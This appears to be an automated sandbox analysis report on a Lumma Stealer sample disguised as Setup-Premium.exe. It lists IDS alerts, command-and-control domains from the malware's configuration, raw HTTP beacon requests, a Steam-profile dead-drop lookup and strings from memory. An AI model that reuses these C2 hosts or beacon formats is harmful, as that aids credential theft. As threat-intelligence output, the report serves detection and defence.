                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49710 -> 172.67.205.156:443
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49744 -> 104.102.49.254:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49724 -> 172.67.173.224:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49724 -> 172.67.173.224:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49751 -> 104.21.53.8:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49751 -> 104.21.53.8:443
                  Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49757 -> 104.21.53.8:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49757 -> 104.21.53.8:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: vennurviot.sbs
                  Source: Malware configuration extractorURLs: condifendteu.sbs
                  Source: Malware configuration extractorURLs: mathcucom.sbs
                  Source: Malware configuration extractorURLs: enlargkiw.sbs
                  Source: Malware configuration extractorURLs: proclaimykn.buzz
                  Source: Malware configuration extractorURLs: resinedyw.sbs
                  Source: Malware configuration extractorURLs: ehticsprocw.sbs
                  Source: Malware configuration extractorURLs: drawwyobstacw.sbs
                  Source: Malware configuration extractorURLs: allocatinow.sbs
                  Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: proclaimykn.buzz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=7dVCApaVSuJAHxS2hly8AvsgLmmtzBWUGr_DufxF.Bw-1728776664-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 75Host: sergei-esenin.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficDNS traffic detected: DNS query: proclaimykn.buzz
                  Source: global trafficDNS traffic detected: DNS query: mathcucom.sbs
                  Source: global trafficDNS traffic detected: DNS query: allocatinow.sbs
                  Source: global trafficDNS traffic detected: DNS query: enlargkiw.sbs
                  Source: global trafficDNS traffic detected: DNS query: resinedyw.sbs
                  Source: global trafficDNS traffic detected: DNS query: vennurviot.sbs
                  Source: global trafficDNS traffic detected: DNS query: ehticsprocw.sbs
                  Source: global trafficDNS traffic detected: DNS query: condifendteu.sbs
                  Source: global trafficDNS traffic detected: DNS query: drawwyobstacw.sbs
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: proclaimykn.buzz
                  Source: Setup-Premium.exeString found in binary or memory: http://.css
                  Source: Setup-Premium.exeString found in binary or memory: http://.jpg
                  Source: Setup-Premium.exeString found in binary or memory: http://html4/loose.dtd
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/definitions/positiveInteger
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/definitions/positiveIntegerDefault0
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/definitions/stringArray
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/default
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/description
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/enum
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/exclusiveMaximum
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/exclusiveMinimum
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/maximum
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/minimum
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/multipleOf
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/pattern
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/title
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/type
                  Source: Setup-Premium.exeString found in binary or memory: http://json-schema.org/draft-04/schema#/properties/uniqueItems
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: Setup-Premium.exeString found in binary or memory: http://swagger.io/v2/schema.json#
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://condifendteu.sbs/api
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawwyobstacw.sbs/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawwyobstacw.sbs/api
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawwyobstacw.sbs/ht
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/M
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/api
                  Source: Setup-Premium.exeString found in binary or memory: https://github.com/zitadel/zitadel/blob/new-eventstore/cmd/zitadel/startup.yaml.
                  Source: Setup-Premium.exeString found in binary or memory: https://gorm.io/docs/hooks.htmlWarning:
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                  Source: Setup-Premium.exeString found in binary or memory: https://index.docker.io/v1/input
                  Source: BitLockerToGo.exe, 00000002.00000003.2183297651.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2193093217.0000000002F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/
                  Source: BitLockerToGo.exe, 00000002.00000003.2183297651.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2193093217.0000000002F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/%
